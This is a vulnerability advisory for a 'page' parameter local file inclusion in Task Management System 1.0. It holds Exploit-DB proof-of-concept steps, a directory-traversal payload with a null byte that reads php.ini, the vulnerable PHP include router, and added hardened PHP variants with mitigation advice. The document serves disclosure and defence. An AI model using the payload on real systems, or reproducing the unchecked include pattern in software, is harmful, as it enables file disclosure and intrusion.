Vendor: Task Management System
Author: İsmail BOZKURT
CVSS: 7.5 (HIGH)
CWE: 22 (Local File Inclusion)
Product Name: Task Management System
Affected Version From: Version 1
Affected Version To: Version 1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 x86_64
Date: 2020

Task Management System 1.0 – ‘page’ Local File Inclusion

Task Management System 1.0 is vulnerable to Local File Inclusion (LFI) because index.php takes the user-supplied 'page' parameter, appends ".php" to it and passes the result straight to include(), checking only that the file exists and never that it lies inside the application's page directory. An authenticated attacker can therefore place a directory-traversal sequence in the 'page' parameter to include an arbitrary file from the local filesystem. Because the application appends ".php", the published payload ends in a URL-encoded null byte (%00) to truncate that suffix; this truncation only works on PHP versions that still honour a null byte in file paths (the author notes PHP versions below 5.3.3). The published proof of concept reads the web server's php.ini from the XAMPP installation. The issue affects version 1 of the application and was tested on Windows 10 x86_64.

Mitigation:

Do not build include paths from user input. Map the 'page' parameter onto a fixed allowlist of page names and serve the 404 page for anything else. If the set of pages must remain dynamic, reject any value containing path separators, "..", or null bytes, and confine the resolved path (realpath) to a single pages directory before including it. Upgrading PHP removes the null-byte truncation but not the traversal itself, so the application-level fix is still required.
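The following is an added example, not code from the application or from the advisory's author. It places the router logic shown in the raw data beside two hardened variants: an allowlist that keeps user input out of the filesystem path entirely, and a realpath-confined fallback for cases where the page set must stay dynamic. The page names other than 'home' and 'index', the pages directory and the function names are assumptions for illustration.

```php
<?php
// Added example (not the application's own code). Each router returns the
// file that would be included, so the logic can be exercised without include().

// Vulnerable form, as in the application's index.php: user input is glued onto
// ".php" and handed to the filesystem with only an existence check. A value such
// as "../../../c:/xampp/apache/bin/php.ini%00" walks out of the web root and, on
// PHP versions that still honour a null byte in paths, drops the ".php" suffix.
function route_vulnerable(array $get): string
{
    $page = isset($get['page']) ? $get['page'] : 'home';
    if (!file_exists($page . ".php")) {
        return '404.html';
    }
    return $page . '.php';
}

// Hardened form: the request parameter is only ever used as a lookup key.
// 'branch' is an assumed page name; only 'home' and 'index' appear in the advisory.
const PAGES = [
    'home'   => 'home.php',
    'index'  => 'index.php',
    'branch' => 'branch.php',
];

function route_hardened(array $get): string
{
    $page = isset($get['page']) ? (string) $get['page'] : 'home';
    // Anything that is not a short, bare, allowlisted identifier (traversal
    // sequences, null bytes, absolute paths, unknown names) falls through to 404.
    if (!preg_match('/\A[a-z0-9_]{1,32}\z/', $page) || !array_key_exists($page, PAGES)) {
        return '404.html';
    }
    return PAGES[$page];
}

// Defence in depth when the page set must stay dynamic: strip anything that is
// not a bare file name, then require the resolved path to sit inside $pagesDir
// and to still carry the ".php" suffix after resolution.
function route_confined(string $pagesDir, array $get): string
{
    $page = isset($get['page']) ? (string) $get['page'] : 'home';
    if ($page === '' || strpos($page, "\0") !== false || basename($page) !== $page) {
        return '404.html';
    }
    $base   = realpath($pagesDir);
    $target = realpath($pagesDir . DIRECTORY_SEPARATOR . $page . '.php');
    if ($base === false || $target === false
        || strpos($target, $base . DIRECTORY_SEPARATOR) !== 0
        || substr($target, -4) !== '.php') {
        return '404.html';
    }
    return $target;
}

// Demonstration with the payload from the advisory (null byte decoded from %00).
$payload = ['page' => "../../../c:/xampp/apache/bin/php.ini\0"];
echo route_hardened($payload), "\n";            // 404.html
echo route_hardened(['page' => 'index']), "\n"; // index.php
echo route_hardened([]), "\n";                  // home.php
```

The allowlist variant is the one to prefer: a traversal payload cannot even be expressed as a key, so no PHP version dependence remains. The confined variant is kept only for code bases that cannot enumerate their pages; note that it checks the null byte explicitly because basename() alone does not reject it.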

Exploit-DB raw data:

# Exploit Title: Task Management System 1.0 - 'page' Local File Inclusion
# Exploit Author: İsmail BOZKURT
# Date: 2020-12-15
# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application
# Tested on: Windows 10 x86_64

Step 1. Log into the application with credentials.
Step 2. Click on Branch.
Step 3. Select New Branch (http://127.0.0.1/index.php?page=index).
Step 4. Change index to ../../../c:/xampp/apache/bin/php.ini%00

Note: PHP version < 5.3.3

<section class="content">
    <div class="container-fluid">
    <?php
        // Vulnerable router from index.php: the 'page' query parameter is only
        // checked for existence, never for traversal, before being included.
        $page = isset($_GET['page']) ? $_GET['page'] : 'home';
        if (!file_exists($page.".php")) {
            include '404.html';
        } else {
            include $page.'.php';
        }
    ?>
    </div>
</section>